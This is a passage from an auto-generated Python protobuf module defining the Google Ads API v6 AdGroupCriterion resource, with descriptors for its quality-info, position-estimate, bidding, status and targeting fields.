from google.ads.google_ads.v6.proto.enums import bidding_source_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2
from google.ads.google_ads.v6.proto.enums import criterion_system_serving_status_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__system__serving__status__pb2
from google.ads.google_ads.v6.proto.enums import criterion_type_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__type__pb2
from google.ads.google_ads.v6.proto.enums import quality_score_bucket_pb2 as google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2
from google.api import field_behavior_pb2 as google_dot_api_dot_field__behavior__pb2
from google.api import resource_pb2 as google_dot_api_dot_resource__pb2
from google.api import annotations_pb2 as google_dot_api_dot_annotations__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/ads/googleads/v6/resources/ad_group_criterion.proto',
package='google.ads.googleads.v6.resources',
syntax='proto3',
serialized_options=b'\n%com.google.ads.googleads.v6.resourcesB\025AdGroupCriterionProtoP\001ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v6/resources;resources\242\002\003GAA\252\002!Google.Ads.GoogleAds.V6.Resources\312\002!Google\\Ads\\GoogleAds\\V6\\Resources\352\002%Google::Ads::GoogleAds::V6::Resources',
create_key=_descriptor._internal_create_key,
  serialized_pb=b'\n:google/ads/googleads/v6/resources/ad_group_criterion.proto\x12!google.ads.googleads.v6.resources\x1a-google/ads/googleads/v6/common/criteria.proto\x1a\x35google/ads/googleads/v6/common/custom_parameter.proto\x1a\x46google/ads/googleads/v6/enums/ad_group_criterion_approval_status.proto\x1a=google/ads/googleads/v6/enums/ad_group_criterion_status.proto\x1a\x32google/ads/googleads/v6/enums/bidding_source.proto\x1a\x43google/ads/googleads/v6/enums/criterion_system_serving_status.proto\x1a\x32google/ads/googleads/v6/enums/criterion_type.proto\x1a\x38google/ads/googleads/v6/enums/quality_score_bucket.proto\x1a\x1fgoogle/api/field_behavior.proto\x1a\x19google/api/resource.proto\x1a\x1cgoogle/api/annotations.proto\"\xe2$\n\x10\x41\x64GroupCriterion\x12H\n\rresource_name\x18\x01 \x01(\tB1\xe0\x41\x05\xfa\x41+\n)googleads.googleapis.com/AdGroupCriterion\x12\x1e\n\x0c\x63riterion_id\x18\x38 \x01(\x03\x42\x03\xe0\x41\x03H\x01\x88\x01\x01\x12`\n\x06status\x18\x03 \x01(\x0e\x32P.google.ads.googleads.v6.enums.AdGroupCriterionStatusEnum.AdGroupCriterionStatus\x12Z\n\x0cquality_info\x18\x04 \x01(\x0b\x32?.google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfoB\x03\xe0\x41\x03\x12?\n\x08\x61\x64_group\x18\x39 \x01(\tB(\xe0\x41\x05\xfa\x41\"\n googleads.googleapis.com/AdGroupH\x02\x88\x01\x01\x12Q\n\x04type\x18\x19 \x01(\x0e\x32>.google.ads.googleads.v6.enums.CriterionTypeEnum.CriterionTypeB\x03\xe0\x41\x03\x12\x1a\n\x08negative\x18: \x01(\x08\x42\x03\xe0\x41\x05H\x03\x88\x01\x01\x12\x80\x01\n\x15system_serving_status\x18\x34 \x01(\x0e\x32\\.google.ads.googleads.v6.enums.CriterionSystemServingStatusEnum.CriterionSystemServingStatusB\x03\xe0\x41\x03\x12~\n\x0f\x61pproval_status\x18\x35 \x01(\x0e\x32`.google.ads.googleads.v6.enums.AdGroupCriterionApprovalStatusEnum.AdGroupCriterionApprovalStatusB\x03\xe0\x41\x03\x12 \n\x13\x64isapproval_reasons\x18; \x03(\tB\x03\xe0\x41\x03\x12\x19\n\x0c\x62id_modifier\x18= \x01(\x01H\x04\x88\x01\x01\x12\x1b\n\x0e\x63pc_bid_micros\x18> \x01(\x03H\x05\x88\x01\x01\x12\x1b\n\x0e\x63pm_bid_micros\x18? '
  b'\x01(\x03H\x06\x88\x01\x01\x12\x1b\n\x0e\x63pv_bid_micros\x18@ \x01(\x03H\x07\x88\x01\x01\x12#\n\x16percent_cpc_bid_micros\x18\x41 \x01(\x03H\x08\x88\x01\x01\x12*\n\x18\x65\x66\x66\x65\x63tive_cpc_bid_micros\x18\x42 \x01(\x03\x42\x03\xe0\x41\x03H\t\x88\x01\x01\x12*\n\x18\x65\x66\x66\x65\x63tive_cpm_bid_micros\x18\x43 \x01(\x03\x42\x03\xe0\x41\x03H\n\x88\x01\x01\x12*\n\x18\x65\x66\x66\x65\x63tive_cpv_bid_micros\x18\x44 \x01(\x03\x42\x03\xe0\x41\x03H\x0b\x88\x01\x01\x12\x32\n effective_percent_cpc_bid_micros\x18\x45 \x01(\x03\x42\x03\xe0\x41\x03H\x0c\x88\x01\x01\x12\x65\n\x18\x65\x66\x66\x65\x63tive_cpc_bid_source\x18\x15 \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12\x65\n\x18\x65\x66\x66\x65\x63tive_cpm_bid_source\x18\x16 \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12\x65\n\x18\x65\x66\x66\x65\x63tive_cpv_bid_source\x18\x17 \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12m\n effective_percent_cpc_bid_source\x18# \x01(\x0e\x32>.google.ads.googleads.v6.enums.BiddingSourceEnum.BiddingSourceB\x03\xe0\x41\x03\x12\x66\n\x12position_estimates\x18\n \x01(\x0b\x32\x45.google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimatesB\x03\xe0\x41\x03\x12\x12\n\nfinal_urls\x18\x46 \x03(\t\x12\x19\n\x11\x66inal_mobile_urls\x18G \x03(\t\x12\x1d\n\x10\x66inal_url_suffix\x18H \x01(\tH\r\x88\x01\x01\x12\"\n\x15tracking_url_template\x18I \x01(\tH\x0e\x88\x01\x01\x12N\n\x15url_custom_parameters\x18\x0e \x03(\x0b\x32/.google.ads.googleads.v6.common.CustomParameter\x12\x43\n\x07keyword\x18\x1b \x01(\x0b\x32+.google.ads.googleads.v6.common.KeywordInfoB\x03\xe0\x41\x05H\x00\x12G\n\tplacement\x18\x1c \x01(\x0b\x32-.google.ads.googleads.v6.common.PlacementInfoB\x03\xe0\x41\x05H\x00\x12Y\n\x13mobile_app_category\x18\x1d \x01(\x0b\x32\x35.google.ads.googleads.v6.common.MobileAppCategoryInfoB\x03\xe0\x41\x05H\x00\x12X\n\x12mobile_application\x18\x1e \x01(\x0b\x32\x35.google.ads.googleads.v6.common.MobileApplicationInfoB\x03\xe0\x41\x05H\x00\x12N\n\rlisting_group\x18  \x01(\x0b\x32\x30.google.ads.googleads.v6.common.ListingGroupInfoB\x03\xe0\x41\x05H\x00\x12\x46\n\tage_range\x18$ \x01(\x0b\x32,.google.ads.googleads.v6.common.AgeRangeInfoB\x03\xe0\x41\x05H\x00\x12\x41\n\x06gender\x18% \x01(\x0b\x32*.google.ads.googleads.v6.common.GenderInfoB\x03\xe0\x41\x05H\x00\x12L\n\x0cincome_range\x18& \x01(\x0b\x32/.google.ads.googleads.v6.common.IncomeRangeInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0fparental_status\x18\' \x01(\x0b\x32\x32.google.ads.googleads.v6.common.ParentalStatusInfoB\x03\xe0\x41\x05H\x00\x12\x46\n\tuser_list\x18* \x01(\x0b\x32,.google.ads.googleads.v6.common.UserListInfoB\x03\xe0\x41\x05H\x00\x12N\n\ryoutube_video\x18( \x01(\x0b\x32\x30.google.ads.googleads.v6.common.YouTubeVideoInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0fyoutube_channel\x18) \x01(\x0b\x32\x32.google.ads.googleads.v6.common.YouTubeChannelInfoB\x03\xe0\x41\x05H\x00\x12?\n\x05topic\x18+ \x01(\x0b\x32).google.ads.googleads.v6.common.TopicInfoB\x03\xe0\x41\x05H\x00\x12N\n\ruser_interest\x18- \x01(\x0b\x32\x30.google.ads.googleads.v6.common.UserInterestInfoB\x03\xe0\x41\x05H\x00\x12\x43\n\x07webpage\x18. '
  b'\x01(\x0b\x32+.google.ads.googleads.v6.common.WebpageInfoB\x03\xe0\x41\x05H\x00\x12U\n\x11\x61pp_payment_model\x18/ \x01(\x0b\x32\x33.google.ads.googleads.v6.common.AppPaymentModelInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0f\x63ustom_affinity\x18\x30 \x01(\x0b\x32\x32.google.ads.googleads.v6.common.CustomAffinityInfoB\x03\xe0\x41\x05H\x00\x12N\n\rcustom_intent\x18\x31 \x01(\x0b\x32\x30.google.ads.googleads.v6.common.CustomIntentInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0f\x63ustom_audience\x18J \x01(\x0b\x32\x32.google.ads.googleads.v6.common.CustomAudienceInfoB\x03\xe0\x41\x05H\x00\x12V\n\x11\x63ombined_audience\x18K \x01(\x0b\x32\x34.google.ads.googleads.v6.common.CombinedAudienceInfoB\x03\xe0\x41\x05H\x00\x1a\x8d\x03\n\x0bQualityInfo\x12\x1f\n\rquality_score\x18\x05 \x01(\x05\x42\x03\xe0\x41\x03H\x00\x88\x01\x01\x12m\n\x16\x63reative_quality_score\x18\x02 \x01(\x0e\x32H.google.ads.googleads.v6.enums.QualityScoreBucketEnum.QualityScoreBucketB\x03\xe0\x41\x03\x12o\n\x18post_click_quality_score\x18\x03 \x01(\x0e\x32H.google.ads.googleads.v6.enums.QualityScoreBucketEnum.QualityScoreBucketB\x03\xe0\x41\x03\x12k\n\x14search_predicted_ctr\x18\x04 \x01(\x0e\x32H.google.ads.googleads.v6.enums.QualityScoreBucketEnum.QualityScoreBucketB\x03\xe0\x41\x03\x42\x10\n\x0e_quality_score\x1a\xbc\x03\n\x11PositionEstimates\x12\'\n\x15\x66irst_page_cpc_micros\x18\x06 \x01(\x03\x42\x03\xe0\x41\x03H\x00\x88\x01\x01\x12+\n\x19\x66irst_position_cpc_micros\x18\x07 \x01(\x03\x42\x03\xe0\x41\x03H\x01\x88\x01\x01\x12(\n\x16top_of_page_cpc_micros\x18\x08 \x01(\x03\x42\x03\xe0\x41\x03H\x02\x88\x01\x01\x12<\n*estimated_add_clicks_at_first_position_cpc\x18\t \x01(\x03\x42\x03\xe0\x41\x03H\x03\x88\x01\x01\x12:\n(estimated_add_cost_at_first_position_cpc\x18\n \x01(\x03\x42\x03\xe0\x41\x03H\x04\x88\x01\x01\x42\x18\n\x16_first_page_cpc_microsB\x1c\n\x1a_first_position_cpc_microsB\x19\n\x17_top_of_page_cpc_microsB-\n+_estimated_add_clicks_at_first_position_cpcB+\n)_estimated_add_cost_at_first_position_cpc:t\xea\x41q\n)googleads.googleapis.com/AdGroupCriterion\x12\x44\x63ustomers/{customer_id}/adGroupCriteria/{ad_group_id}~{criterion_id}B\x0b\n\tcriterionB\x0f\n\r_criterion_idB\x0b\n\t_ad_groupB\x0b\n\t_negativeB\x0f\n\r_bid_modifierB\x11\n\x0f_cpc_bid_microsB\x11\n\x0f_cpm_bid_microsB\x11\n\x0f_cpv_bid_microsB\x19\n\x17_percent_cpc_bid_microsB\x1b\n\x19_effective_cpc_bid_microsB\x1b\n\x19_effective_cpm_bid_microsB\x1b\n\x19_effective_cpv_bid_microsB#\n!_effective_percent_cpc_bid_microsB\x13\n\x11_final_url_suffixB\x18\n\x16_tracking_url_templateB\x82\x02\n%com.google.ads.googleads.v6.resourcesB\x15\x41\x64GroupCriterionProtoP\x01ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v6/resources;resources\xa2\x02\x03GAA\xaa\x02!Google.Ads.GoogleAds.V6.Resources\xca\x02!Google\\Ads\\GoogleAds\\V6\\Resources\xea\x02%Google::Ads::GoogleAds::V6::Resourcesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads_dot_v6_dot_common_dot_criteria__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_common_dot_custom__parameter__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__approval__status__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_ad__group__criterion__status__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_bidding__source__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__system__serving__status__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_criterion__type__pb2.DESCRIPTOR,google_dot_ads_dot_googleads_dot_v6_dot_enums_dot_quality__score__bucket__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
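# A minimal usage sketch (assumption: the AdGroupCriterion message class is
# registered by the _reflection boilerplate further down in this generated
# module, as in other *_pb2 files):
#
#     criterion = AdGroupCriterion(
#         resource_name='customers/123/adGroupCriteria/456~789')
#     payload = criterion.SerializeToString()  # wire-format bytes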
_ADGROUPCRITERION_QUALITYINFO = _descriptor.Descriptor(
name='QualityInfo',
full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.quality_score', index=0,
number=5, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='creative_quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.creative_quality_score', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='post_click_quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.post_click_quality_score', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='search_predicted_ctr', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo.search_predicted_ctr', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='_quality_score', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.QualityInfo._quality_score',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=4072,
serialized_end=4469,
)
_ADGROUPCRITERION_POSITIONESTIMATES = _descriptor.Descriptor(
name='PositionEstimates',
full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='first_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.first_page_cpc_micros', index=0,
number=6, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='first_position_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.first_position_cpc_micros', index=1,
number=7, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='top_of_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.top_of_page_cpc_micros', index=2,
number=8, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='estimated_add_clicks_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.estimated_add_clicks_at_first_position_cpc', index=3,
number=9, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='estimated_add_cost_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates.estimated_add_cost_at_first_position_cpc', index=4,
number=10, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='_first_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._first_page_cpc_micros',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_first_position_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._first_position_cpc_micros',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_top_of_page_cpc_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._top_of_page_cpc_micros',
index=2, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_estimated_add_clicks_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._estimated_add_clicks_at_first_position_cpc',
index=3, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_estimated_add_cost_at_first_position_cpc', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.PositionEstimates._estimated_add_cost_at_first_position_cpc',
index=4, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=4472,
serialized_end=4916,
)
_ADGROUPCRITERION = _descriptor.Descriptor(
name='AdGroupCriterion',
full_name='google.ads.googleads.v6.resources.AdGroupCriterion',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005\372A+\n)googleads.googleapis.com/AdGroupCriterion', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='criterion_id', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.criterion_id', index=1,
number=56, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.status', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='quality_info', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.quality_info', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='ad_group', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.ad_group', index=4,
number=57, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005\372A\"\n googleads.googleapis.com/AdGroup', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.type', index=5,
number=25, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='negative', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.negative', index=6,
number=58, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='system_serving_status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.system_serving_status', index=7,
number=52, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='approval_status', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.approval_status', index=8,
number=53, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='disapproval_reasons', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.disapproval_reasons', index=9,
number=59, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='bid_modifier', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.bid_modifier', index=10,
number=61, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.cpc_bid_micros', index=11,
number=62, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.cpm_bid_micros', index=12,
number=63, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.cpv_bid_micros', index=13,
number=64, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.percent_cpc_bid_micros', index=14,
number=65, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpc_bid_micros', index=15,
number=66, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpm_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpm_bid_micros', index=16,
number=67, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpv_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpv_bid_micros', index=17,
number=68, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_percent_cpc_bid_micros', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_percent_cpc_bid_micros', index=18,
number=69, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpc_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpc_bid_source', index=19,
number=21, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpm_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpm_bid_source', index=20,
number=22, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_cpv_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_cpv_bid_source', index=21,
number=23, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='effective_percent_cpc_bid_source', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.effective_percent_cpc_bid_source', index=22,
number=35, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='position_estimates', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.position_estimates', index=23,
number=10, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='final_urls', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.final_urls', index=24,
number=70, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='final_mobile_urls', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.final_mobile_urls', index=25,
number=71, type=9, cpp_type=9, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='final_url_suffix', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.final_url_suffix', index=26,
number=72, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='tracking_url_template', full_name='google.ads.googleads.v6.resources.AdGroupCriterion.tracking_url_template', index=27,
number=73, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
